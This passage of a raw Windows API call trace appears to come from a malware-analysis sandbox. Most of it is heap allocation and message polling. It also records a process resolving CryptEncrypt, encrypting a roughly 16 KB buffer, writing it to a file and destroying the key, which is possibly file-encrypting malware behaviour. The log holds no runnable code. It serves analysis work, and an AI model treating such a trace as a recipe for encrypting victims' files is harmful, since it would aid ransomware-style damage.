Size=0x8) returned 0x2e550f8 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0238.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x2f20448 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20448 | out: hHeap=0x970000) returned 1 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0238.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0238.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513a0 [0238.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0238.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.535] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0238.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f3f0 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0238.536] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1c588*, pdwDataLen=0x8cef60*=0x3eb0, dwBufLen=0x3eb8 | out: pbData=0x2f1c588*, pdwDataLen=0x8cef60*=0x3eb8) returned 1 [0238.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0238.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0238.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0238.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0238.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0238.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0238.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.539] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0238.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.539] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0238.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.539] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.539] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0238.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.544] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x3eb8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x3eb8, lpOverlapped=0x0) returned 1 [0238.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.546] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.546] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0238.546] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.547] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0238.547] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0238.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0238.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.547] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.548] CryptDestroyKey (hKey=0xa87690) returned 1 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.548] RtlAllocateHeap 